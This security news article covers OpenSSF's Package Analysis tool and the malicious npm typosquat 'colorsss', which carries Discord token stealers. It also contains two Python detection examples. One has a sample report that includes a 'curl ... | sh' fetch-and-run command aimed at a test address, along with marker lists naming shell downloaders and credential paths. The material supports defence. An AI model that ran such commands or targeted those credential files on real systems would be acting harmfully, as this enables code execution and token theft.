
Open source ‘Package Analysis’ tool finds malicious npm, PyPI packages

The Open Source Security Foundation (OpenSSF), a Linux Foundation-backed initiative, has released the first prototype version of its ‘Package Analysis’ tool, which aims to catch and counter malicious attacks on open source registries.

In a pilot run that lasted less than a month, the open source project, released on GitHub, was able to identify over 200 malicious npm and PyPI packages.

Project aims to combat malware in open source registries

This week, OpenSSF released its initial prototype version of the ‘Package Analysis’ project on GitHub.

The project repository contains tools that analyze open source packages, in particular to hunt for malicious npm and PyPI packages.

“The Package Analysis project seeks to understand the behavior and capabilities of packages available on open source repositories: what files do they access, what addresses do they connect to, and what commands do they run?” explain Caleb Brown and David A. Wheeler, who are involved in OpenSSF’s Securing Critical Projects working group.

“The project also tracks changes in how packages behave over time, to identify when previously safe software begins acting suspiciously.”
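The three questions quoted above (which files, which addresses, which commands) plus the comparison across versions describe a behaviour diff. The script below is an added example, not code from the OpenSSF Package Analysis project: it takes two behaviour reports in a constructed layout (a dict with "files", "addresses" and "commands" lists, as a sandbox run of the package's install and import steps might produce), reports only what the newer version does that the older one did not, and turns that delta into findings. The package name "examplelib", both reports, the TEST-NET address and the marker lists are all constructed for the example.

```python
"""Detect behavioural changes between two versions of a package.

Added example, not the OpenSSF Package Analysis project's own code. The report
layout and the two sample reports are constructed for illustration.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Behavior:
    """What a package version touched during a sandboxed run."""
    files: frozenset
    addresses: frozenset
    commands: frozenset


def load_behavior(report: dict) -> Behavior:
    """Build a Behavior from a (constructed) report dict."""
    return Behavior(
        files=frozenset(report.get("files", [])),
        addresses=frozenset(report.get("addresses", [])),
        commands=frozenset(report.get("commands", [])),
    )


def diff_behavior(old: Behavior, new: Behavior) -> dict:
    """Return only what the new version does that the old one did not."""
    return {
        "new_files": sorted(new.files - old.files),
        "new_addresses": sorted(new.addresses - old.addresses),
        "new_commands": sorted(new.commands - old.commands),
    }


# Substrings that turn a behaviour change into a finding. Assumed markers
# chosen for this example; tune them to the environment being monitored.
SENSITIVE_PATH_MARKERS = ("/.ssh/", "/.npmrc", "/.aws/", "Local Storage/leveldb")
SHELL_MARKERS = ("sh -c", "bash -c", "curl ", "wget ", "powershell")


def triage(diff: dict) -> list:
    """Turn a behaviour diff into human-readable findings."""
    findings = []
    for path in diff["new_files"]:
        if any(m in path for m in SENSITIVE_PATH_MARKERS):
            findings.append(f"reads sensitive path: {path}")
    # Any new network destination is worth a look: a library that never
    # talked to the network before and now does is the classic warning sign.
    for addr in diff["new_addresses"]:
        findings.append(f"new network destination: {addr}")
    for cmd in diff["new_commands"]:
        if any(m in cmd for m in SHELL_MARKERS):
            findings.append(f"spawns shell or downloader: {cmd}")
    return findings


# Constructed reports for two versions of a hypothetical package "examplelib".
# Version 1.0.0 only reads its own files; 1.0.1 additionally reads a Discord
# client database (where the client keeps its tokens), contacts a TEST-NET
# address and spawns a shell to fetch a second stage.
REPORT_V1 = {
    "files": ["node_modules/examplelib/package.json",
              "node_modules/examplelib/lib/index.js"],
    "addresses": [],
    "commands": [],
}
REPORT_V2 = {
    "files": [
        "node_modules/examplelib/package.json",
        "node_modules/examplelib/lib/index.js",
        "node_modules/examplelib/lib/util.js",
        "/home/user/.config/discord/Local Storage/leveldb/000003.ldb",
    ],
    "addresses": ["203.0.113.5:443"],
    "commands": ["sh -c 'curl -s https://203.0.113.5/stage2 | sh'"],
}


def compare_versions(old_report: dict, new_report: dict) -> list:
    """Findings for new_report relative to old_report."""
    return triage(diff_behavior(load_behavior(old_report),
                                load_behavior(new_report)))


if __name__ == "__main__":
    for line in compare_versions(REPORT_V1, REPORT_V2):
        print(line)
```

Running it against the two constructed reports yields three findings (the Discord database read, the new network destination and the shell spawn); the benign new file `lib/util.js` appears in the diff but produces no finding. Comparing a version with itself yields nothing, which is the property that lets a pipeline stay quiet until a package's behaviour actually changes.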

In its test run that lasted under a month, Package Analysis was able to identify more than 200 malicious PyPI and npm components, according to OpenSSF.

The vast majority of these malicious packages, says OpenSSF, are dependency confusion and typosquatting attacks.

Among the malicious packages identified by Package Analysis is ‘colorsss’, which had previously been deemed malicious:

[Image: malicious npm typosquat ‘colorsss’ (BleepingComputer)]

The ‘colorsss’ package is a typosquat of the popular colors npm library, select versions of which had been sabotaged by its developer this January, as first reported by BleepingComputer.
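A typosquat such as ‘colorsss’ is a name within a small edit distance of a popular package. The check below is an added example, not part of Package Analysis or of the article: it computes the optimal string alignment distance (insert, delete, substitute, or swap two adjacent characters) between a candidate name and a short list of popular names and flags near misses. The popular-name list is a constructed sample; a real deployment would derive it from registry download statistics, and dependency confusion (a public package shadowing an internal one) needs a separate registry lookup that this example does not cover.

```python
"""Flag package names that are a near miss of a popular package.

Added example, not the Package Analysis project's own code. POPULAR is a
constructed sample list, not registry data.
"""

POPULAR = {"colors", "lodash", "express", "request", "chalk"}


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance between a and b.

    Counts insertions, deletions, substitutions and transpositions of two
    adjacent characters, each costing 1. Transpositions matter for typosquats
    because 'lodahs' is one swap away from 'lodash'.
    """
    rows, cols = len(a) + 1, len(b) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(
                d[i - 1][j] + 1,        # deletion
                d[i][j - 1] + 1,        # insertion
                d[i - 1][j - 1] + cost, # substitution (or match)
            )
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[rows - 1][cols - 1]


def typosquat_candidates(name: str, popular=POPULAR, max_distance: int = 2) -> list:
    """Return popular names that `name` sits within max_distance of, nearest first.

    A name that is itself on the popular list is never flagged, so the real
    'colors' package does not trip the check.
    """
    if name in popular:
        return []
    scored = sorted((osa_distance(name, p), p) for p in popular)
    return [p for dist, p in scored if dist <= max_distance]


def review_names(names) -> dict:
    """Map each suspicious name to the popular packages it imitates."""
    return {n: hits for n in names if (hits := typosquat_candidates(n))}


if __name__ == "__main__":
    # Constructed sample of names as they might arrive from a registry feed.
    sample = ["colorsss", "colors", "lodahs", "expres", "left-pad"]
    for name, hits in review_names(sample).items():
        print(f"{name}: looks like {', '.join(hits)}")
```

On the constructed sample, ‘colorsss’ is flagged as two insertions away from ‘colors’, ‘lodahs’ as one transposition from ‘lodash’, and ‘expres’ as one deletion from ‘express’, while ‘colors’ itself and ‘left-pad’ produce nothing. The distance threshold is the main knob: raising it catches more variants but also flags unrelated short names, so in practice it is paired with a popularity threshold on the target package.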

In addition to containing some legitimate files from the colors library, the malicious ‘colorsss’ package carries obfuscated malware, according to an archived copy of the package obtained by BleepingComputer from open source security firm Sonatype:

[Image: Obfuscated malware hidden inside ‘colorsss’ typosquat (BleepingComputer)]

The obfuscated code in ‘colorsss’ contains Discord token stealers, a recurring theme among malicious npm packages.

“Though the project has been in development for a while, it has only recently become useful following extensive modifications based on initial experiences,” states OpenSSF in a blog post released this week.

“There are lots of opportunities for involvement with this project, and we welcome anyone interested in contributing to the future goals of… detecting differences in package behavior over time; automating the processing of the Package Analysis results; storing the packages themselves as they are processed for long-term analysis; and improving the reliability of the pipeline.”

Full disclosure: I regularly attend OpenSSF group meetings as a member. The malicious typosquat ‘colorsss’ mentioned in the piece had previously been analyzed by the Sonatype security research team, which includes me.

Source: https://www.bleepingcomputer.com/news/security/open-source-package-analysis-tool-finds-malicious-npm-pypi-packages/
